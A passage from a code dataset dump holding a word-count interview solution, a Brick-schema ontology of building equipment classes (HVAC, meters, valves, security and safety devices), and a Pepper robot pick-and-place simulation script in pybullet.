scripted languages like JavaScript, Python, Ruby etc.). 
The expected output will simply be an array of string arrays.\n\nConstraints:\n[time limit] 5000ms\n[input] string document\n[output] array.array.string\n\"\"\"\n# Time complexity: O(N)\n# Space complexity: O(N)\nimport collections\ndef word_count_engine(document):\n punct = \"!@#$%^&*(),./;':\\\"[]{}?<>~\"\n formatted = [process(word, punct) for word in document.split()]\n count = collections.defaultdict(int)\n for word in formatted:\n if word: count[word] += 1\n \n ordered_by_freq = collections.defaultdict(list)\n for word in formatted:\n if word in count:\n ordered_by_freq[count[word]].append(word)\n del count[word]\n \n output = []\n for i in reversed(range(len(formatted))):\n if i in ordered_by_freq:\n for word in ordered_by_freq[i]:\n output.append([word, str(i)])\n return output\n \ndef process(word, punct):\n temp = [c for c in word.lower() if c not in punct]\n return \"\".join(temp)\n","sub_path":"Interviews/Pramp: Word Count Engine.py","file_name":"Pramp: Word Count Engine.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"58964183","text":"from rdflib import Literal\nfrom .namespaces import TAG, OWL, SKOS, BRICK, RDFS\n\n\"\"\"\nSet up subclasses of the equipment superclass\n\"\"\"\nequipment_subclasses = {\n \"HVAC\": {\n OWL.equivalentClass: BRICK[\"Heating_Ventilation_Air_Conditioning_System\"],\n \"tags\": [TAG.Heat, TAG.Ventilation, TAG.Air, TAG.Conditioning, TAG.System],\n },\n \"Heating_Ventilation_Air_Conditioning_System\": {\n OWL.equivalentClass: BRICK[\"HVAC\"],\n \"tags\": [TAG.HVAC],\n },\n \"Weather\": {\"tags\": [TAG.Weather]},\n \"Electrical_System\": {\n \"tags\": [TAG.Electrical, TAG.System],\n \"subclasses\": {\n \"Emergency_Power_Off_System\": {\n \"tags\": [TAG.Emergency, TAG.Power, TAG.Off, TAG.Equipment],\n },\n \"Energy_Storage\": {\n \"tags\": [TAG.Energy, TAG.Storage, TAG.Equipment],\n \"subclasses\": {\n \"Battery\": {\n \"tags\": [TAG.Battery, TAG.Energy, TAG.Storage, TAG.Equipment],\n },\n },\n },\n \"Inverter\": {\"tags\": [TAG.Inverter, TAG.Equipment]},\n \"PlugStrip\": {\"tags\": [TAG.PlugStrip, TAG.Equipment]},\n },\n },\n \"Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment],\n \"subclasses\": {\n \"Electrical_Meter\": {\n \"tags\": [TAG.Electrical, TAG.Meter, TAG.Equipment],\n \"subclasses\": {\n \"Building_Electrical_Meter\": {\n \"tags\": [\n TAG.Building,\n TAG.Electrical,\n TAG.Meter,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Building_Meter],\n }\n },\n },\n \"Gas_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Gas],\n \"subclasses\": {\n \"Building_Gas_Meter\": {\n \"tags\": [TAG.Building, TAG.Gas, TAG.Meter, TAG.Equipment],\n \"parents\": [BRICK.Building_Meter],\n }\n },\n },\n \"Water_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Water],\n \"parents\": [BRICK.Water_System],\n \"subclasses\": {\n \"Building_Water_Meter\": {\n \"tags\": [TAG.Building, TAG.Water, TAG.Meter, TAG.Equipment],\n \"parents\": [BRICK.Building_Meter],\n },\n \"Chilled_Water_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Water, TAG.Chilled],\n \"parents\": [BRICK.Chilled_Water_System],\n \"subclasses\": {\n \"Building_Chilled_Water_Meter\": {\n \"tags\": [\n TAG.Building,\n TAG.Chilled,\n TAG.Water,\n TAG.Meter,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Building_Meter],\n },\n },\n },\n \"Hot_Water_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Water, TAG.Hot],\n \"parents\": [BRICK.Chilled_Water_System],\n \"subclasses\": {\n 
\"Building_Hot_Water_Meter\": {\n \"tags\": [\n TAG.Building,\n TAG.Hot,\n TAG.Water,\n TAG.Meter,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Building_Meter],\n },\n },\n },\n },\n },\n \"Building_Meter\": {\"tags\": [TAG.Meter, TAG.Equipment, TAG.Building]},\n },\n },\n \"Water_System\": {\n \"tags\": [TAG.Water, TAG.Equipment],\n \"subclasses\": {\n \"Chilled_Water_System\": {\n OWL.equivalentClass: BRICK[\"CWS\"],\n \"tags\": [TAG.Water, TAG.Chilled, TAG.Equipment],\n },\n \"Hot_Water_System\": {\n OWL.equivalentClass: BRICK[\"HWS\"],\n \"tags\": [TAG.Water, TAG.Hot, TAG.Equipment],\n \"subclasses\": {\n \"Domestic_Hot_Water_System\": {\n \"tags\": [TAG.Domestic, TAG.Water, TAG.Hot, TAG.Equipment],\n },\n },\n },\n \"CWS\": {\n OWL.equivalentClass: BRICK[\"Chilled_Water_System\"],\n \"tags\": [TAG.CWS],\n },\n \"HWS\": {OWL.equivalentClass: BRICK[\"Hot_Water_System\"], \"tags\": [TAG.HWS]},\n },\n },\n \"Steam_System\": {\"tags\": [TAG.Steam, TAG.Equipment]},\n \"Solar_Panel\": {\"tags\": [TAG.Solar, TAG.Equipment]},\n \"Shading_System\": {\n \"tags\": [TAG.Shade, TAG.Equipment],\n \"subclasses\": {\"Louver\": {\"tags\": [TAG.Shade, TAG.Equipment, TAG.Louver]}},\n },\n \"Lighting_System\": {\n \"tags\": [TAG.Lighting, TAG.Equipment],\n \"subclasses\": {\n \"Lighting\": {\n \"subclasses\": {\n \"Luminaire\": {\"tags\": [TAG.Luminaire, TAG.Equipment]},\n \"Luminaire_Driver\": {\n \"tags\": [TAG.Luminaire, TAG.Driver, TAG.Equipment],\n },\n },\n },\n \"Interface\": {\n \"tags\": [TAG.Equipment, TAG.Interface],\n \"subclasses\": {\n \"Switch\": {\n \"tags\": [TAG.Equipment, TAG.Interface, TAG.Switch],\n \"subclasses\": {\n \"Dimmer\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Interface,\n TAG.Switch,\n TAG.Dimmer,\n ],\n },\n },\n },\n \"Touchpanel\": {\n \"tags\": [TAG.Equipment, TAG.Interface, TAG.Touchpanel],\n },\n },\n },\n },\n },\n \"Furniture\": {\"tags\": [TAG.Equipment, TAG.Furniture]},\n \"Fire_Safety_System\": {\n \"tags\": [TAG.Equipment, TAG.Fire, TAG.Safety, TAG.System],\n \"subclasses\": {\n \"Fire_Control_Panel\": {\n \"tags\": [TAG.Equipment, TAG.Fire, TAG.Safety, TAG.Panel],\n OWL.equivalentClass: BRICK[\"FCP\"],\n },\n \"FCP\": {\"tags\": [TAG.FCP, TAG.Equipment]},\n },\n },\n \"Elevator\": {\"tags\": [TAG.Elevator, TAG.Equipment]},\n \"Security_Equipment\": {\"tags\": [TAG.Security, TAG.Equipment]},\n \"Safety_Equipment\": {\"tags\": [TAG.Safety, TAG.Equipment]},\n \"Camera\": {\"tags\": [TAG.Camera, TAG.Equipment]},\n}\n\n\n\"\"\"\nDefine classes of HVAC equipment\n\"\"\"\nhvac_subclasses = {\n \"Variable_Frequency_Drive\": {\n \"tags\": [TAG.Equipment, TAG.Variable, TAG.Frequency, TAG.Drive],\n OWL.equivalentClass: BRICK[\"VFD\"],\n SKOS.definition: Literal(\n \"Electronic device that varies its output frequency to vary the rotating speed of a motor, given a fixed input frequency. 
Used with fans or pumps to vary the flow in the system as a function of a maintained pressure.\"\n ),\n },\n \"Valve\": {\n \"tags\": [TAG.Valve, TAG.Equipment]\n # subclasses defined in 'valve_subclasses'\n },\n \"VFD\": {\n \"tags\": [TAG.Equipment, TAG.VFD],\n \"subclasses\": {\n \"Heat_Wheel_VFD\": {\"tags\": [TAG.Equipment, TAG.Heat, TAG.Wheel, TAG.VFD]},\n },\n },\n \"Thermostat\": {\n \"tags\": [TAG.Equipment, TAG.Thermostat],\n SKOS.definition: Literal(\n \"An automatic control device used to maintain temperature at a fixed or adjustable setpoint.\"\n ),\n },\n \"Terminal_Unit\": {\n \"tags\": [TAG.Equipment, TAG.Terminal, TAG.Unit],\n SKOS.definition: Literal(\n \"A device that regulates the volumetric flow rate and/or the temperature of the controlled medium.\"\n ),\n \"subclasses\": {\n \"Fan_Coil_Unit\": {\n \"tags\": [TAG.Equipment, TAG.Fan, TAG.Coil, TAG.Unit],\n OWL.equivalentClass: BRICK[\"FCU\"],\n },\n \"FCU\": {\"tags\": [TAG.FCU]},\n \"Variable_Air_Volume_Box\": {\n \"tags\": [TAG.Equipment, TAG.Variable, TAG.Volume, TAG.Box],\n OWL.equivalentClass: BRICK[\"VAV\"],\n \"subclasses\": {\n \"Variable_Air_Volume_Box_With_Reheat\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Variable,\n TAG.Volume,\n TAG.Box,\n TAG.Reheat,\n ],\n OWL.equivalentClass: BRICK[\"RVAV\"],\n },\n \"RVAV\": {\"tags\": [TAG.Equipment, TAG.RVAV]},\n },\n },\n \"VAV\": {\"tags\": [TAG.Equipment, TAG.VAV]},\n },\n },\n \"Space_Heater\": {\n \"tags\": [TAG.Equipment, TAG.Space, TAG.Heater],\n SKOS.definition: Literal(\n \"A heater used to warm the air in an enclosed area, such as a room or office\"\n ),\n },\n \"Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump],\n SKOS.definition: Literal(\n \"Machine for imparting energy to a fluid, causing it to do work, drawing a fluid into itself through an entrance port, and forcing the fluid out through an exhaust port.\"\n ),\n \"subclasses\": {\n \"Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Water],\n \"subclasses\": {\n \"Chilled_Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Chilled, TAG.Water],\n },\n \"Condenser_Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Condenser, TAG.Water],\n },\n \"Hot_Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Hot, TAG.Water],\n },\n },\n },\n },\n },\n \"Heat_Exchanger\": {\n \"tags\": [TAG.Equipment, TAG.Heat, TAG.Exchanger],\n OWL.equivalentClass: BRICK[\"HX\"],\n \"subclasses\": {\n \"Evaporative_Heat_Exchanger\": {\n \"tags\": [TAG.Evaporative, TAG.Equipment, TAG.Heat, TAG.Exchanger],\n },\n \"Condenser_Heat_Exchanger\": {\n \"tags\": [TAG.Condenser, TAG.Equipment, TAG.Heat, TAG.Exchanger],\n },\n \"Heat_Wheel\": {\n \"tags\": [TAG.Equipment, TAG.Heat, TAG.Wheel],\n SKOS.definition: Literal(\n \"A type of energy recovery heat exchanger positioned within the supply and exhaust air streams of an air-handling system or in the exhaust gases of an industrial process, in order to recover the heat energy\"\n ),\n RDFS.seeAlso: Literal(\"https://en.wikipedia.org/wiki/Thermal_wheel\"),\n },\n },\n },\n \"HX\": {\"tags\": [TAG.Equipment, TAG.HX]},\n \"Fume_Hood\": {\n \"tags\": [TAG.Equipment, TAG.Fume, TAG.Hood],\n SKOS.definition: Literal(\n \"A fume-collection device mounted over a work space, table, or shelf and serving to conduct unwanted gases away from the area enclosed.\"\n ),\n },\n \"Filter\": {\n \"tags\": [TAG.Equipment, TAG.Filter],\n SKOS.definition: Literal(\"Device to remove gases from a mixture of gases\"),\n \"subclasses\": {\n \"Mixed_Air_Filter\": {\n \"tags\": 
[TAG.Equipment, TAG.Mixed, TAG.Air, TAG.Filter],\n },\n },\n },\n \"Fan\": {\n SKOS.definition: Literal(\n \"Any device with two or more blades or vanes attached to a rotating shaft used to produce an airflow for the purpose of comfort, ventilation, exhaust, heating, cooling, or any other gaseous transport.\"\n ),\n \"tags\": [TAG.Equipment, TAG.Fan],\n \"subclasses\": {\n \"Cooling_Tower_Fan\": {\n \"tags\": [TAG.Cool, TAG.Tower, TAG.Equipment, TAG.Fan],\n },\n \"Exhaust_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Exhaust]},\n \"Return_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Return]},\n \"Standby_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Standby]},\n \"Discharge_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Discharge]},\n \"Supply_Fan\": {\n \"tags\": [TAG.Equipment, TAG.Fan, TAG.Supply],\n \"subclasses\": {\n \"Booster_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Booster]},\n },\n },\n },\n },\n \"Economizer\": {\n \"tags\": [TAG.Equipment, TAG.Economizer],\n SKOS.definition: Literal(\n \"Device that, on proper variable sensing, initiates control signals or actions to conserve energy. A control system that reduces the mechanical heating and cooling requirement.\"\n ),\n },\n \"Damper\": {\n SKOS.definition: Literal(\n \"Element inserted into an air-distribution system or element of an air-distribution system permitting modification of the air resistance of the system and consequently changing the airflow rate or shutting off the airflow.\"\n ),\n \"tags\": [TAG.Equipment, TAG.Damper],\n \"subclasses\": {\n \"Economizer_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Economizer]},\n \"Exhaust_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Exhaust]},\n \"Outside_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Outside]},\n \"Return_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Return]},\n },\n },\n \"Condenser\": {\n \"tags\": [TAG.Equipment, TAG.Condenser],\n SKOS.definition: Literal(\n \"A heat exchanger in which the primary heat transfer vapor changes its state to a liquid phase.\"\n ),\n },\n \"Computer_Room_Air_Conditioning\": {\n \"tags\": [TAG.Equipment, TAG.Computer, TAG.Room, TAG.Air, TAG.Conditioning],\n SKOS.definition: Literal(\n \"A device that monitors and maintains the temperature, air distribution and humidity in a network room or data center. \"\n ),\n OWL.equivalentClass: BRICK[\"CRAC\"],\n },\n \"CRAC\": {\n \"tags\": [TAG.Equipment, TAG.CRAC],\n OWL.equivalentClass: BRICK[\"Computer_Room_Air_Conditioning\"],\n \"subclasses\": {\n \"Standby_CRAC\": {\"tags\": [TAG.Equipment, TAG.CRAC, TAG.Standby]},\n },\n },\n \"Compressor\": {\n \"tags\": [TAG.Equipment, TAG.Compressor],\n SKOS.definition: Literal(\n \"(1) device for mechanically increasing the pressure of a gas. (2) often described as being either open, hermetic, or semihermetic to describe how the compressor and motor drive is situated in relation to the gas or vapor being compressed. Types include centrifugal, axial flow, reciprocating, rotary screw, rotary vane, scroll, or diaphragm. 1. device for mechanically increasing the pressure of a gas. 2. 
specific machine, with or without accessories, for compressing refrigerant vapor.\"\n ),\n },\n \"Coil\": {\n SKOS.definition: Literal(\n \"Exchanger that transfers heat from an exhaust airstream to a separated supply airstream.\"\n ),\n \"tags\": [TAG.Equipment, TAG.Coil],\n \"subclasses\": {\n \"Cooling_Coil\": {\"tags\": [TAG.Equipment, TAG.Coil, TAG.Cool]},\n \"Heating_Coil\": {\"tags\": [TAG.Equipment, TAG.Coil, TAG.Heat]},\n },\n },\n \"Chiller\": {\n \"tags\": [TAG.Equipment, TAG.Chiller],\n \"subclasses\": {\n \"Absorption_Chiller\": {\n \"tags\": [TAG.Equipment, TAG.Chiller, TAG.Absorption],\n },\n \"Centrifugal_Chiller\": {\n \"tags\": [TAG.Equipment, TAG.Chiller, TAG.Centrifugal],\n },\n },\n },\n \"Humidifier\": {\"tags\": [TAG.Equipment, TAG.Humidifier]},\n \"Boiler\": {\n \"tags\": [TAG.Equipment, TAG.Boiler],\n SKOS.definition: Literal(\n \"A closed, pressure vessel that uses fuel or electricity for heating water or other fluids to supply steam or hot water for heating, humidification, or other applications.\"\n ),\n },\n \"Air_Handler_Unit\": {\n \"tags\": [TAG.Equipment, TAG.Air, TAG.Handler, TAG.Unit],\n SKOS.definition: Literal(\n \"Assembly consisting of sections containing a fan or fans and other necessary equipment to perform one or more of the following functions: circulating, filtration, heating, cooling, heat recovery, humidifying, dehumidifying, and mixing of air. Is usually connected to an air-distribution system.\"\n ),\n OWL.equivalentClass: BRICK[\"AHU\"],\n },\n \"AHU\": {\n \"tags\": [TAG.Equipment, TAG.AHU],\n \"subclasses\": {\n \"Rooftop_Unit\": {\n OWL.equivalentClass: BRICK[\"RTU\"],\n \"tags\": [TAG.Equipment, TAG.Rooftop, TAG.AHU],\n },\n \"RTU\": {\n \"tags\": [TAG.Equipment, TAG.RTU],\n OWL.equivalentClass: BRICK[\"Rooftop_Unit\"],\n },\n },\n },\n}\n\n\"\"\"\nValve subclasses\n\"\"\"\nvalve_subclasses = {\n \"Heating_Valve\": {\n \"tags\": [TAG.Valve, TAG.Heat, TAG.Equipment],\n \"subclasses\": {\n \"Reheat_Valve\": {\"tags\": [TAG.Valve, TAG.Reheat, TAG.Heat, TAG.Equipment]},\n \"Return_Heating_Valve\": {\n \"tags\": [TAG.Valve, TAG.Return, TAG.Heat, TAG.Equipment],\n SKOS.definition: Literal(\n \"A valve installed on the return side of a heat exchanger\"\n ),\n },\n \"Domestic_Hot_Water_Valve\": {\n \"tags\": [\n TAG.Domestic,\n TAG.Water,\n TAG.Hot,\n TAG.Valve,\n TAG.Heat,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Domestic_Hot_Water_System, BRICK.Water_Valve],\n },\n \"Preheat_Hot_Water_Valve\": {\n \"tags\": [\n TAG.Preheat,\n TAG.Water,\n TAG.Hot,\n TAG.Valve,\n TAG.Heat,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Hot_Water_System, BRICK.Water_Valve],\n },\n },\n },\n \"Cooling_Valve\": {\"tags\": [TAG.Valve, TAG.Cool, TAG.Equipment]},\n \"Water_Valve\": {\n \"tags\": [TAG.Valve, TAG.Water, TAG.Equipment],\n \"subclasses\": {\n \"Chilled_Water_Valve\": {\n \"tags\": [TAG.Chilled, TAG.Valve, TAG.Water, TAG.Equipment],\n \"parents\": [BRICK.Chilled_Water_System],\n },\n },\n },\n \"Isolation_Valve\": {\"tags\": [TAG.Isolation, TAG.Valve, TAG.Equipment]},\n}\n\nsecurity_subclasses = {\n \"Access_Control_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Access, TAG.Control],\n \"subclasses\": {\n \"Access_Reader\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Access,\n TAG.Reader,\n TAG.Control,\n ],\n SKOS.definition: Literal(\n \"Used in physical security systems to read a credential that allows access through access points. 
\"\n \"Usually card badge credentials for locked doors or monitored checkpoints.\"\n ),\n },\n },\n # TODO subclasses\n # Access (Control) Panel: The controller panel will typically have electrical connections for the selected credential reader,\n # a relay output to control the door release, door position input, programmable inputs and outputs, and inputs for the REX.\n # Accsss Control Sub Panel (Alarm Panel)?\n # Panel_Input: Input into the access panel: switch toggle, button press, credential entered/scanned/swiped, etc\n # Panel_Output: Ouput from the access panel: some sort of function is activated, door area is unlocked, etc\n # Reader_Aux_Input: The input from the reader on the “other” side of the controlled door\n # Reader_Aux_Output: The output from the reader on the “other” side of the controlled door\n # Biometric Reader: Reader of biometric characteristics to be used for authentication\n # REX: Request to exit. a required accessory in an access control system, which can take the form of anything from a\n # mushroom button to an infrared sensor. In an access control system, the REX (Request to exit) trips a relay in the panel\n # to bypass “door forced” alarms within the access control software to avoid false alarms in the audit report. It can also be\n # used to trip a relay which changes the state of an electric electronic item from on to off, lock to unlock or open to close.\n # Magnetic_Lock: Electromagnetic or magnetic lock, a locking mechanisim that consists of an electromagnet and an armature plate.\n # Electrified_Lock: An electronic lock, a locking device that works by means of electric current. Can be controlled remotely\n # depending on the locking system.\n # Door_Release: An electronic input device used to immediately unlock specififed doors that are equipped with electronic locks.\n # Badge Station: A kiosk or checkpoint that requires the use of a badge in order to verify credentials and to grant access.\n },\n \"Video_Surveillance_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Video, TAG.Surveillance],\n \"subclasses\": {\n \"Surveillance_Camera\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Video,\n TAG.Surveillance,\n TAG.Camera,\n ],\n SKOS.definition: Literal(\n \"An optical instrument to capture still images or record moving images, which are stored on a physical or digital medium.\"\n ),\n \"parents\": [BRICK.Camera]\n # TODO: subclass of PTZ (Pan/Tilt/Zoom) cameras?\n },\n \"NVR\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Video,\n TAG.Surveillance,\n TAG.NVR,\n ],\n OWL.equivalentClass: BRICK[\"Network_Video_Recorder\"],\n SKOS.definition: Literal(\"A Network Video Recorder.\"),\n },\n \"Network_Video_Recorder\": {\n \"tags\": [\n TAG.NVR,\n TAG.Equipment,\n TAG.Security,\n TAG.Video,\n TAG.Recorder,\n TAG.Network,\n ],\n OWL.equivalentClass: BRICK[\"NVR\"],\n SKOS.definition: Literal(\"A Network Video Recorder.\"),\n },\n },\n # TODO\n # Encoder: (Do we imply video encoder here?) - A device that is used to convert information from one format to another.\n # Switch: Again this sounds generic - A device that can connect, disconnect, or divert current in an electrical current (or signal)\n # - is any specific kind of switch e.g. 
PoESwitch implied here?\n # Video_Wall (or should this be in a separate classification with displays and monitors?)\n },\n \"Intrusion_Detection_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Intrusion, TAG.Detection],\n # TODO\n # Motion sensor - but maybe to Points, but still need a way to represent security motion sensors\n # Security Control Panel: The central hub of a security system. All devices are connected to the security panel for easy\n # and efficient access for different security protocols (i.e. Intrusion security) and events. Question: How’s this different from\n # Access Panel? Is this specific to Intrusion detection system or more general?\n # Glass_Break_Sensor: a sensor used in electronic alarms that detect if pane of glass has been shattered or is broken.\n # Duress_Button: Panic button, an electronic input device used to help alerting someone in emergency situations.\n # Door_Contacts: Door contact sensor, a peripheral security sensor that lets an alarm system know whether a door is\n # open or closed.\n },\n \"Intercom_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Intercom],\n \"subclasses\": {\n \"Emergency_Phone\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Intercom,\n TAG.Emergency,\n TAG.Phone,\n ],\n SKOS.definition: Literal(\n \"A phone specifically provided for making calls to emergency services.\"\n ),\n },\n \"Video_Intercom\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Intercom, TAG.Video],\n SKOS.definition: Literal(\n \"An intercom device that has video capabilites as well as voice capabilities\"\n ),\n },\n },\n },\n}\n\nsafety_subclasses = {\n \"Automated_External_Defibrillator\": {\n OWL.equivalentClass: BRICK[\"AED\"],\n \"tags\": [TAG.Equipment, TAG.Safety, TAG.AED, TAG.Defibrillator],\n SKOS.definition: Literal(\n \"Automated External Defibrillator. Used by trained people to help those experiencing cardiac issues.\"\n ),\n },\n \"AED\": {\n OWL.equivalentClass: BRICK[\"Automated_External_Defibrillator\"],\n \"tags\": [TAG.Equipment, TAG.Safety, TAG.AED, TAG.Defibrillator],\n SKOS.definition: Literal(\n \"Automated External Defibrillator. 
Used by trained people to help those experiencing cardiac issues.\"\n        ),\n    },\n    \"First_Aid_Kit\": {\n        \"tags\": [TAG.Equipment, TAG.Safety, TAG.Aid, TAG.FirstAid],\n        SKOS.definition: Literal(\n            \"A collection of medical supplies placed in a well-known location to provide immediate treatment\"\n        ),\n    },\n    \"Emergency_Wash_Station\": {\n        \"tags\": [TAG.Equipment, TAG.Safety, TAG.Wash, TAG.Station, TAG.Emergency],\n        SKOS.definition: Literal(\n            \"A piece of plumbed equipment to flush chemicals or hazardous substances off of a person\"\n        ),\n        \"subclasses\": {\n            \"Eye_Wash_Station\": {\n                \"tags\": [\n                    TAG.Equipment,\n                    TAG.Safety,\n                    TAG.Wash,\n                    TAG.Station,\n                    TAG.Emergency,\n                    TAG.Eye,\n                ],\n                SKOS.definition: Literal(\n                    \"An emergency wash station to flush chemicals or hazardous substances out of a persons eye\"\n                ),\n            },\n            \"Safety_Shower\": {\n                \"tags\": [\n                    TAG.Equipment,\n                    TAG.Safety,\n                    TAG.Wash,\n                    TAG.Station,\n                    TAG.Emergency,\n                    TAG.Shower,\n                ],\n                SKOS.definition: Literal(\n                    \"An emergency wash station to flush chemicals or hazardous substances off of a person\"\n                ),\n            },\n            \"Drench_Hose\": {\n                \"tags\": [\n                    TAG.Equipment,\n                    TAG.Safety,\n                    TAG.Wash,\n                    TAG.Station,\n                    TAG.Emergency,\n                    TAG.Drench,\n                    TAG.Hose,\n                ],\n                SKOS.definition: Literal(\n                    \"An emergency wash station to flush chemicals or hazardous substances off of a person by spraying water on them from a distance\"\n                ),\n            },\n        },\n    },\n}\n","sub_path":"bricksrc/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":28680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"593059436","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 5 10:04:31 2019\n\n@author: nicolas\n\"\"\"\n\nimport random\nimport pybullet\nimport pybullet_data\nimport cv2\nimport time\nfrom qibullet import SimulationManager\nfrom qibullet import PepperVirtual\n\nliste_choix = [\"cat\",\"turtle\",\"parrot\"]\nchoix = liste_choix[1]\n\n#-----------------------------Initialization-----------------------------------\ndef main(): \n    \"Initialize the variables\"\n    simulation_manager = SimulationManager() \n    client = simulation_manager.launchSimulation(gui=True)\n    pepper = simulation_manager.spawnPepper(client, spawn_ground_plane=True)\n    pybullet.setAdditionalSearchPath(pybullet_data.getDataPath())\n    \n    \n    \"Call the functions\"\n    Environnement(client)\n    pepper.goToPosture(\"Stand\", 0.6)\n    time.sleep(1)\n    Catch_Objet_Milieu(pepper)\n    \"\"\"for i in range(2): \n        Prise_Photo(pepper)\"\"\"\n    Retour_Depart_Milieu(pepper)\n    Lacher_Objet(pepper,choix)\n    \n    while True:\n        cv2.waitKey(1)\n    \n    \n#----------------------------OBJECT LOADING FUNCTION--------------------------- \n\"Here we load all the objects of the environment in which the robot will operate\"\ndef Environnement(client): \n    \n    coord_y = [-0.8,0.0,0.8]\n    liste_coord_y = random.sample(coord_y,3)\n    \n    pybullet.loadURDF(\n        \"table2.urdf\",\n        basePosition=[2.3, 0, 0.3],\n        globalScaling=17,\n        physicsClientId=client)\n    \n    pybullet.loadURDF(\n        \"totem_Tortue.urdf\",\n        basePosition=[1.95, -0.8, 0.7],\n        globalScaling=1.5,\n        physicsClientId=client)\n    \n    pybullet.loadURDF(\n        \"totem_Parrot.urdf\",\n        basePosition=[1.95, 0.8, 0.7],\n        globalScaling=1.5,\n        physicsClientId=client)\n    \n    pybullet.loadURDF(\n        \"totem_Cat.urdf\",\n        basePosition=[1.95, 0, 0.7],\n        globalScaling=1.5,\n        physicsClientId=client)\n\n    pybullet.loadURDF(\n        \"caisse.urdf\",\n        basePosition=[0.0, 2.5, 0.01],\n        globalScaling=0.2,\n        physicsClientId=client)\n\n    pybullet.loadURDF(\n        
\"caisse.urdf\",\n basePosition=[-0.1, -2.5, 0.1],\n globalScaling=0.2,\n physicsClientId=client)\n\n pybullet.loadURDF(\n \"caisse.urdf\",\n basePosition=[-1.8,-0.05, 0.1],\n globalScaling=0.2,\n physicsClientId=client)\n\n\n#----------------------------FONCTION_Prise_Photos-----------------------------\n\"Ici on donne les instructions de mouvement pour que le robot prenne tous les animaux en photo\"\n\n \ndef Retour_Depart_Milieu(pepper):\n #pepper.moveTo(0,-0.8,0) \n #time.sleep(1)\n pepper.moveTo(-0.9,0,0)\n time.sleep(1)\n \ndef Catch_Objet_Milieu(pepper):\n pepper.moveTo(1.06,0,0) \n pepper.setAngles(\"RElbowRoll\", 0.0, 1.0) \n pepper.setAngles(\"RShoulderPitch\", 0.15, 1.0) \n pepper.setAngles(\"RHand\", 1.5, 1.0) \n pepper.moveTo(0.55,0,0)\n pepper.moveTo(0,0.187,0)\n pepper.setAngles(\"RHand\", 0.00, 1.0) \n time.sleep(4)\n pepper.moveTo(-0.73,0,0)\n time.sleep(4)\n pepper.moveTo(0,-0.187,0)\n time.sleep(1)\n \ndef Prise_Photo(pepper):\n pepper.setAngles(\"HeadPitch\",-1.0, 1.0) #le robot lève la tête pour avoir le bon angle\n pepper.subscribeCamera(PepperVirtual.ID_CAMERA_BOTTOM)\n img = pepper.getCameraFrame() #prise de photo\n cv2.imshow(\"bottom camera\", img) #affichage de la photo\n time.sleep(5)\n pepper.moveTo(0,0.8,0)\n time.sleep(1) \n \ndef Lacher_Objet(pepper, choix):\n if choix == \"cat\":\n pepper.moveTo(-0.9,0,0)\n time.sleep(1)\n pepper.moveTo(0,0,3.14)\n time.sleep(1)\n pepper.setAngles(\"RElbowRoll\", -0.3, 1.0) \n time.sleep(1)\n pepper.setAngles(\"RHand\", 1.5, 1.0) \n time.sleep(1)\n elif choix == \"parrot\":\n pepper.moveTo(0,-1.80,0)\n time.sleep(1)\n pepper.moveTo(0,0,-1.57)\n time.sleep(1)\n pepper.setAngles(\"RHand\", 1.5, 1.0) \n time.sleep(1)\n elif choix == \"turtle\":\n pepper.moveTo(0,1.80,0)\n time.sleep(1)\n pepper.moveTo(0,0,1.57)\n time.sleep(1)\n time.sleep(1)\n pepper.setAngles(\"RHand\", 1.5, 1.0) \n time.sleep(1)\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Script_Projet_Nico/Pepper_Basic_Nico.py","file_name":"Pepper_Basic_Nico.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"68188442","text":"#!/usr/bin/env python3\n#\n# Copyright 2021 Graviti. 
